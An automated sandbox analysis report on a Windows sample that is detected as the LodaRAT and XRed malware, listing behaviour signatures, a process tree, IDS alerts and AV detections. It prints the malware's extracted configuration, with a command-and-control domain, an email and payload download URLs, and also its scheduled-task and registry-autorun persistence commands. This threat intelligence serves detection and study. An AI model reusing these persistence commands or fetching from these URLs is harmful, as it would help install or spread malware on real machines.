Windows Analysis Report
Supplier 0202AW-PER2 Sheet.exe

Overview

General Information

Sample name: Supplier 0202AW-PER2 Sheet.exe
Analysis ID: 1582318
MD5: 97e5ba8188b0e2613fd02ee2b8dfee7a
SHA1: 17e314b66392d3d14e68f3e4a0ce4e3649255835
SHA256: 2d976b78efe5c7e983ff4cef98deb25d21a901e8f954f6d915d5642e75420296
Tags: exe, user-JAMESWT_MHT

Detection

LodaRAT, XRed
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

  • System is w10x64
  • Supplier 0202AW-PER2 Sheet.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe" MD5: 97E5BA8188B0E2613FD02EE2B8DFEE7A)
    • ._cache_Supplier 0202AW-PER2 Sheet.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe" MD5: DB7FC8188230C44A2B7360862DCF26E9)
      • cmd.exe (PID: 7512 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7572 cmdline: schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 7548 cmdline: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 7412 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 1D45B99034D67448EBF0776BD5699C84)
      • WerFault.exe (PID: 8264 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7412 -s 7800 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 7452 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 8876 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • DELPQB.exe (PID: 7612 cmdline: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe MD5: DB7FC8188230C44A2B7360862DCF26E9)
  • Synaptics.exe (PID: 6752 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 1D45B99034D67448EBF0776BD5699C84)
  • DELPQB.exe (PID: 1168 cmdline: "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe" MD5: DB7FC8188230C44A2B7360862DCF26E9)
  • DELPQB.exe (PID: 6788 cmdline: "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe" MD5: DB7FC8188230C44A2B7360862DCF26E9)
  • DELPQB.exe (PID: 8316 cmdline: "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe" MD5: DB7FC8188230C44A2B7360862DCF26E9)
  • DELPQB.exe (PID: 8456 cmdline: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe MD5: DB7FC8188230C44A2B7360862DCF26E9)
  • DELPQB.exe (PID: 8748 cmdline: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe MD5: DB7FC8188230C44A2B7360862DCF26E9)
  • cleanup
Name: Loda, LodaRAT
Description: Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.loda
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source | Rule | Description | Author
Supplier 0202AW-PER2 Sheet.exe | JoeSecurity_XRed | Yara detected XRed | Joe Security
Supplier 0202AW-PER2 Sheet.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

Source | Rule | Description | Author
dump.pcap | JoeSecurity_LodaRat_1 | Yara detected LodaRAT | Joe Security

Source | Rule | Description | Author
C:\Users\user\AppData\Local\Temp\ZMNYQK.vbs | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
C:\ProgramData\Synaptics\RCXC902.tmp | JoeSecurity_XRed | Yara detected XRed | Joe Security
C:\ProgramData\Synaptics\RCXC902.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
C:\Users\user\Documents\~$cache1 | JoeSecurity_XRed | Yara detected XRed | Joe Security
C:\Users\user\Documents\~$cache1 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

Source | Rule | Description | Author
00000007.00000002.2484943427.0000000002F58000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
00000002.00000002.2498031591.0000000004DCC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security
00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000003.00000003.1301308336.000000000069F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security

Source | Rule | Description | Author
0.0.Supplier 0202AW-PER2 Sheet.exe.400000.0.unpack | JoeSecurity_XRed | Yara detected XRed | Joe Security
0.0.Supplier 0202AW-PER2 Sheet.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

                                System Summary

Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe, Initiated: true, ProcessId: 7384, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49728
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe" , ParentImage: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe, ParentProcessId: 7384, ParentProcessName: ._cache_Supplier 0202AW-PER2 Sheet.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, ProcessId: 7548, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe" , ParentImage: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe, ParentProcessId: 7384, ParentProcessName: ._cache_Supplier 0202AW-PER2 Sheet.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, ProcessId: 7548, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe" , ParentImage: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe, ParentProcessId: 7384, ParentProcessName: ._cache_Supplier 0202AW-PER2 Sheet.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, ProcessId: 7548, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe, ProcessId: 7384, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ZMNYQK
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe, ProcessId: 7384, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZMNYQK.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1, CommandLine: schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7512, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1, ProcessId: 7572, ProcessName: schtasks.exe
Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe" , ParentImage: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe, ParentProcessId: 7384, ParentProcessName: ._cache_Supplier 0202AW-PER2 Sheet.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, ProcessId: 7548, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe" , ParentImage: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe, ParentProcessId: 7384, ParentProcessName: ._cache_Supplier 0202AW-PER2 Sheet.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, ProcessId: 7548, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe, ProcessId: 7292, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 7412, TargetFilename: C:\Users\user~1\AppData\Local\Temp\zWdpyzM9.xlsm
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T10:58:09.817408+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49705 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:09.913069+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49704 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:10.879731+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49712 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:10.918675+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49709 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:12.421827+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49715 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:12.441368+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49716 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:13.517215+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49723 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:13.527812+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49721 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:14.517817+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49736 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:14.522804+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49737 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:15.443750+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49748 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:15.443767+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49749 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:16.611701+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49764 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:16.613834+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49763 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:17.594819+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49772 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:17.602167+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49771 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:18.591556+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49785 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:18.599250+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49786 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:19.645197+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49799 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:19.653539+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49800 | 216.58.206.46 | 443 | TCP
2024-12-30T10:58:20.615514+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.7 | 49808 | 216.58.206.46 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T10:58:12.936943+0100 | 2822116 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49728 | 172.111.138.100 | 5552 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T10:58:26.813226+0100 | 2830912 | 1 | Malware Command and Control Activity Detected | 172.111.138.100 | 5552 | 192.168.2.7 | 49728 | TCP
2024-12-30T10:58:59.134244+0100 | 2830912 | 1 | Malware Command and Control Activity Detected | 172.111.138.100 | 5552 | 192.168.2.7 | 49728 | TCP
2024-12-30T10:59:35.571823+0100 | 2830912 | 1 | Malware Command and Control Activity Detected | 172.111.138.100 | 5552 | 192.168.2.7 | 49728 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T10:58:10.203162+0100 | 2832617 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49708 | 69.42.215.252 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T10:57:56.192769+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49728 | 172.111.138.100 | 5552 | TCP
2024-12-30T10:58:12.936943+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49728 | 172.111.138.100 | 5552 | TCP

                                AV Detection

Source: Supplier 0202AW-PER2 Sheet.exe | Avira: detected
Source: http://xred.site50.net/syn/Synaptics.rar | Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SSLLibrary.dl | Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SUpdate.ini01 | Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/Synaptics.rar4 | Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SSLLibrary.dll | Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SUpdate.ini | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\ZMNYQK.vbs | Avira: detection malicious, Label: VBS/Runner.VPJI
Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Documents\~$cache1 | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\~$cache1 | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\RCXC902.tmp | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCXC902.tmp | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: Supplier 0202AW-PER2 Sheet.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source: C:\ProgramData\Synaptics\RCXC902.tmp | ReversingLabs: Detection: 100%
Source: C:\ProgramData\Synaptics\Synaptics.exe | ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\Documents\~$cache1 | ReversingLabs: Detection: 100%
Source: Supplier 0202AW-PER2 Sheet.exe | Virustotal: Detection: 84%
Source: Submited Sample | Integrated Neural Analysis Model: Matched 94.8% probability
Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Documents\~$cache1 | Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\RCXC902.tmp | Joe Sandbox ML: detected
Source: Supplier 0202AW-PER2 Sheet.exe | Joe Sandbox ML: detected
Source: Supplier 0202AW-PER2 Sheet.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49727 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49773 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49774 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49771 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49772 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49786 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49785 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49809 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49808 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59828 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59829 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59841 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59840 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59866 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59867 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59902 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59904 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:59912 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:59915 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59958 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59957 version: TLS 1.2
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                                Source: Synaptics.exe, 00000003.00000003.1301308336.000000000069F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
